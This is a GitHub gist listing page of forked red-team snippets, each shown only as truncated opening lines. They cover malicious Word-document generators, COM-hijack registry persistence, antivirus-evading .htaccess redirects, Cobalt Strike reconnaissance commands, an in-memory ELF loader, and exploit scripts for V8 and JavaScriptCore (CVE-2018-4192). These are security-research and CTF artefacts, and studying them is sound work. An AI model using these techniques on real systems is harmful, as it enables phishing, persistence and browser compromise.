Skip to content

Instantly share code, notes, and snippets.

View raystyle's full-sized avatar

ray raystyle

45 followers · 21 following
  • beijing
View GitHub Profile
@raystyle
raystyle / Shell.Explorer open file.ps1
Created September 25, 2018 10:41 — forked from securifybv/Shell.Explorer open file.ps1
PowerShell script that creates a Word document containing an embedded Internet Explorer object. It uses Packager to create an object that looks like an embedded file, clicking the object will trigger a file download. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'
# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url'
# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"
@raystyle
raystyle / Forms.HTML.ps1
Created September 26, 2018 03:01 — forked from securifybv/Forms.HTML.ps1
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object that when clicked will cause Calculator to be opened. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
@raystyle
raystyle / PowerView-3.0-tricks.ps1
Created September 26, 2018 09:53 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@raystyle
raystyle / clr_via_native.c
Created September 28, 2018 02:11 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@raystyle
raystyle / COM_to_registry.ps1
Created September 28, 2018 02:15
$dllPath = "C:\Users\xpn\Desktop\test.dll"
$uuid = "{72C24DD5-D70A-438B-8A42-98424B88D3AD}"
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS -erroraction 'silentlycontinue' | Out-Null
$matches = whoami /user | select-string -Pattern "(S-1-5-[-0-9]+)" -all | select -ExpandProperty Matches
$sid = $matches.value
$key = 'HKU:\{0}_classes' -f $sid
@raystyle
raystyle / .htaccess
Created September 28, 2018 07:57 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
RewriteEngine On
RewriteOptions Inherit
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# Class A Exclusions. Includes large ranges from Azure & AWS
# Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
@raystyle
raystyle / cobaltstrike_sa.txt
Created September 29, 2018 09:36 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@raystyle
raystyle / mem-loader.asm
Created October 8, 2018 05:32 — forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, zznop0x90@gmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license. See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF
@raystyle
raystyle / d8.js
Created October 8, 2018 05:32 — forked from itszn/d8.js
Plaid CTF 2018 d8 exploit
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
@raystyle
raystyle / exploit.js
Created October 8, 2018 05:33 — forked from itszn/exploit.js
Exploit for JavascriptCore CVE-2018-4192
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);